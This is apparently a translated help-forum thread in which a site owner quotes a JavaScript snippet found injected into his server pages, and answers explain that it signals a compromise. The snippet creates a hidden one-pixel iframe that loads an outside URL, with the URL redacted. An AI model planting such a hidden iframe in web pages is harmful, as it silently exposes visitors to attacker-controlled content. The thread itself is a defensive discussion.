我今天登录了我的服务器,并在目录浏览窗口顶部看到了以下无法识别的代码:
document.writeln("");var el = document.createElement("iframe");document.body.appendChild(el);el.id = 'myname';el.name = 'myname';el.style.width = "1px";el.style.height ="1px";el.scrolling="auto";el.frameBorder="0";el.src = "[作者编辑,此处为未知 URL]";
我无法识别该 URL (我已将其编辑掉)。
此外,我的 phpBB3 留言板顶部有许多 phpBB 调试和 PHP 通知,这些对我来说都是新内容。此外,论坛代码中的某些链接似乎已被乱码破坏。
没有添加或删除任何额外内容,但这引起了我的极大担忧。
我的网站上的每个页面都受到 Apache 登录提示的保护,我认为这已经足够了。
我是不是被攻击了,还是我正在向阴影跳跃?
答案1
不幸的是,iframe 从神秘 URL 加载内容几乎肯定表明存在漏洞。
需要专家进行非常彻底的调查才能确定漏洞的程度,但像这样的代码修改意味着设备已完全被攻破。至于下一步该怎么做,请阅读这里。
答案2
您很可能已经遭到攻击。尝试在 Google 上搜索代码片段。下一步是确定他们是否注入了代码,或者它是否是泄露您 FTP 密码的木马。运行 ip 查询并查看黑客驻留在何处(除非通过代理隐藏),上次发生在我身上时,结果是我在我所在城市的网吧泄露了我的密码,因此在改进安全性之前,请确保它没有从您的本地机器受到损害......